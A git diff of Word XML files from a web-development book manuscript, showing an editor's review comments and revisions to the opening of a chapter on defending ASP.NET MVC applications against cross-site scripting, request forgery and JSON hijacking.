+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>This doesn’t seem right. Third-level section headings shouldn’t have numbering.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="12" w:author="Katharine Osborne" w:date="2010-02-06T23:51:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Love it! Very apt metaphor </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F04A"/>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="13" w:author="Katharine Osborne" w:date="2010-02-06T23:51:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Can this be a bit more descriptive?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="14" w:author="Katharine Osborne" w:date="2010-02-06T23:52:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Does this need to be it’s own paragraph?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="15" w:author="Katharine Osborne" w:date="2010-02-06T23:54:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This needs to be a bit more descriptive. What about, “Using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Html.AntiForgeryToken</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)”?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">It may seem a bit nitpicky, but it’s part of Manning’s style to start code listing titles with a verb (or at least be a bit more descriptive than one word). The idea is to emphasize the fact that the user can do something with the listing. </w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="16" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Make sure all the code listing titles are more descriptive.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="17" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>There’s a lot going on in the listing above. Does this need a bit more explanation?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="18" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>This is a much better listing title.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="19" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>What are the other techniques?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="20" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">“We explored </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>them</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> using…”</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="21" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> “…and to HTML encode </w:t>
+      </w:r>
+      <w:r>
+        <w:t>all…”</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+</w:comments>
+</file>
+
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:endnotes xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:r>
@@ -3762,7 +6339,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -3792,7 +6369,7 @@
 </file>
 
 <file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -3822,7 +6399,7 @@
 </file>
 
 <file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:r>
       <w:pgNum/>
@@ -3832,7 +6409,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:footnotes xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:r>
@@ -3853,7 +6430,7 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:hdr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -3862,24 +6439,14 @@
         <w:tab w:val="right" w:pos="7200"/>
       </w:tabs>
     </w:pPr>
-    <w:r>
-      <w:fldChar w:fldCharType="begin"/>
-    </w:r>
-    <w:r>
-      <w:instrText xml:space="preserve">PAGE  </w:instrText>
-    </w:r>
-    <w:r>
-      <w:fldChar w:fldCharType="separate"/>
-    </w:r>
-    <w:r>
-      <w:rPr>
-        <w:noProof/>
-      </w:rPr>
-      <w:t>12</w:t>
-    </w:r>
-    <w:r>
-      <w:fldChar w:fldCharType="end"/>
-    </w:r>
+    <w:fldSimple w:instr="PAGE  ">
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+    </w:fldSimple>
     <w:r>
       <w:tab/>
     </w:r>
@@ -3910,7 +6477,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>1/10/2010</w:t>
+        <w:t>1/12/2010</w:t>
       </w:r>
     </w:fldSimple>
   </w:p>
@@ -3918,7 +6485,7 @@
 </file>
 
 <file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:hdr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -3936,7 +6503,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>1/10/2010</w:t>
+        <w:t>1/12/2010</w:t>
       </w:r>
     </w:fldSimple>
     <w:r>
@@ -3965,7 +6532,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>11</w:t>
+        <w:t>1</w:t>
       </w:r>
     </w:fldSimple>
   </w:p>
@@ -3973,7 +6540,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:numbering xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="FFFFFF7C"/>
     <w:multiLevelType w:val="singleLevel"/>
@@ -5761,7 +8328,7 @@
     </w:rPrDefault>
     <w:pPrDefault/>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="1" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="267">
+  <w:latentStyles w:defLockedState="1" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="276">
     <w:lsdException w:name="Normal" w:locked="0"/>
     <w:lsdException w:name="heading 1" w:locked="0"/>
     <w:lsdException w:name="heading 3" w:locked="0"/>
@@ -5892,13 +8459,13 @@
     <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
     <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
     <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21"/>
-    <w:lsdException w:name="Subtle Reference" w:locked="0" w:uiPriority="31"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32"/>
-    <w:lsdException w:name="Book Title" w:locked="0" w:uiPriority="33"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:locked="0" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:locked="0" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:locked="0" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:locked="0" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:locked="0" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:locked="0" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:locked="0" w:uiPriority="33" w:qFormat="1"/>
     <w:lsdException w:name="Bibliography" w:locked="0" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="TOC Heading" w:locked="0" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
   </w:latentStyles>
@@ -6086,13 +8653,11 @@
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -6108,7 +8673,6 @@
   </w:style>
   <w:style w:type="numbering" w:default="1" w:styleId="NoList">
     <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
@@ -7997,7 +10561,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D91BCAF1-F73E-4C44-A7F5-0DF5A39BDAD2}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2FB41B-03D4-394E-8892-3506BE08EE17}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/manuscript/Chapter11/MVC2iA_CH_11.docx
+++ b/manuscript/Chapter11/MVC2iA_CH_11.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:body>
     <w:p>
       <w:pPr>
@@ -41,9 +41,18 @@
       <w:pPr>
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
+      <w:r>
+        <w:t>Preventing</w:t>
+      </w:r>
       <w:commentRangeStart w:id="0"/>
       <w:r>
-        <w:t>Mitigating Cross Site Scripting attacks</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>cross site s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cripting attacks</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -51,7 +60,10 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Mitigating Cross Site Request Forgeries</w:t>
+        <w:t>Mitigating cross site request f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>orgeries</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -59,7 +71,10 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Mitigating JSON Hijacking</w:t>
+        <w:t>Avoiding JSON h</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ijacking</w:t>
       </w:r>
     </w:p>
     <w:commentRangeEnd w:id="0"/>
@@ -74,12 +89,31 @@
         </w:rPr>
         <w:commentReference w:id="0"/>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Security is often a vague an amorphous topic in web application development.  We rely on the web server to keep our application secure, and we rely on our programming platform.  The rest sometimes seems very theoretical and rare.  In this chapter, we will show real possible attacks and exactly what to do to prevent them by using two main </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">aspects.  The first is traditional management of authentication and authorization. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Italics"/>
+        </w:rPr>
+        <w:t>Authentication</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is ensuring that</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the user has supplied the proper credentials to access the system.  When a user logs in, usually by providing a username and password, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>he</w:t>
+      </w:r>
       <w:commentRangeStart w:id="1"/>
-      <w:r>
-        <w:t xml:space="preserve">Security is an important topic for </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">developers.  </w:t>
+      <w:commentRangeStart w:id="2"/>
+      <w:r>
+        <w:t xml:space="preserve"> is authenticated.  </w:t>
       </w:r>
       <w:commentRangeEnd w:id="1"/>
       <w:r>
@@ -89,54 +123,42 @@
         </w:rPr>
         <w:commentReference w:id="1"/>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">We'll cover two aspects.  The first is traditional management of authentication and authorization. </w:t>
+      <w:commentRangeEnd w:id="2"/>
+      <w:r>
+        <w:commentReference w:id="2"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Italics"/>
         </w:rPr>
-        <w:t>Authentication</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is ensuring that</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the user has supplied the proper credentials to access the system.  When a user logs in, usually by providing a username and password, </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="2"/>
-      <w:r>
-        <w:t xml:space="preserve">it is authenticated.  </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="2"/>
+        <w:t>Authorization</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is making a decision about whether a given user has permission to do something with the system.  When a user accesses a resource not available to other users</w:t>
+      </w:r>
+      <w:commentRangeStart w:id="3"/>
+      <w:commentRangeStart w:id="4"/>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> he</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> has been specifically authorized to do so.</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="3"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="2"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Italics"/>
-        </w:rPr>
-        <w:t>Authorization</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is making a decision about whether a given user has permission to do something with the system.  When a user accesses a resource not available to other users</w:t>
-      </w:r>
-      <w:commentRangeStart w:id="3"/>
-      <w:r>
-        <w:t>, it has been specifically authorized to do so.</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="3"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
         <w:commentReference w:id="3"/>
       </w:r>
+      <w:commentRangeEnd w:id="4"/>
+      <w:r>
+        <w:commentReference w:id="4"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -149,15 +171,7 @@
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> common web attack vectors and technical vulnerabilities that allow attackers to bypass authentication or authorization.  There </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are</w:t>
-      </w:r>
